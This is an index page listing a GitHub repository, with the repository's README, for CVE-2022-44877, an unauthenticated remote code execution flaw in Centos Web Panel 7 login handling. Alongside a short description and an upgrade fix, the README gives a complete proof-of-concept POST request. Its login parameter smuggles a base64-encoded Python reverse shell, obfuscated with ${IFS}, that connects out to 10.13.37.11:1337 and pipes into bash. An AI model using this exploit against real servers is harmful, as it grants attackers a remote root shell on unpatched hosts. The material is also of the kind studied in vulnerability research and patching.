Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/komomon/CVE-2022-44877-RCE

CVE-2022-44877 Centos Web Panel 7 Unauthenticated Remote Code Execution
https://github.com/komomon/CVE-2022-44877-RCE

Last synced: 3 months ago
JSON representation

CVE-2022-44877 Centos Web Panel 7 Unauthenticated Remote Code Execution

Host: GitHub
URL: https://github.com/komomon/CVE-2022-44877-RCE
Owner: komomon
Created: 2023-01-06T16:53:51.000Z (almost 2 years ago)
Default Branch: main
Last Pushed: 2023-01-06T17:00:09.000Z (almost 2 years ago)
Last Synced: 2024-05-20T12:37:23.834Z (6 months ago)
Homepage: HomePage
Size: 1.33 MB
Stars: 9
Watchers: 1
Forks: 1
Open Issues: 0
Metadata Files:
- Readme: readme.md

Awesome Lists containing this project

awesome-hacking-lists - komomon/CVE-2022-44877-RCE - CVE-2022-44877 Centos Web Panel 7 Unauthenticated Remote Code Execution (Others)

README

        # Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877

## Vulnerability description

RESERVED An issue in the /login/index.php component of Centos Web Panel 7 before v0.9.8.1147 allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests

## Version affected

Centos Web Panel 7 - < 0.9.8.1147

## Vulnerability demonstration

```

[+] Centos Web Panel 7 Unauthenticated Remote Code Execution

[+] Centos Web Panel 7 - < 0.9.8.1147

[+] Affected Component ip:2031/login/index.php?login=$(whoami)

[+] Discoverer: Numan Türle @ Gais Cyber Security

[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194

```

[![IMAGE ALT TEXT HERE](images/68747470733a2f2f696d672e796f75747562652e636f6d2f76692f6b694c66537663315359592f302e6a7067.jpeg)](https://www.youtube.com/watch?v=kiLfSvc1SYY)

https://www.gnu.org/software/bash/manual/html_node/Double-Quotes.html

https://www.gnu.org/software/bash/manual/html_node/Shell-Parameter-Expansion.html

```

➜  CVE-2022-44877 echo "example_log" >> log

➜  CVE-2022-44877 cat log

example_log

➜  CVE-2022-44877 echo "example_log $(whoami)" >> log

➜  CVE-2022-44877 cat log

example_log

example_log root

➜  CVE-2022-44877

```

[![img](images/1.png)](https://github.com/numanturle/CVE-2022-44877/blob/main/1.png?raw=true)

[![img](images/2.png)](https://github.com/numanturle/CVE-2022-44877/blob/main/2.png?raw=true)

## Exploit（POC）:

```

POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1

Host: 10.13.37.10:2031

Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82

Content-Length: 40

Origin: https://10.13.37.10:2031

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: https://10.13.37.10:2031/login/index.php?login=failed

Accept-Encoding: gzip, deflate

Accept-Language: en

Connection: close

username=root&password=toor&commit=Login

```

## Solution

Upgrade to CWP7 current version.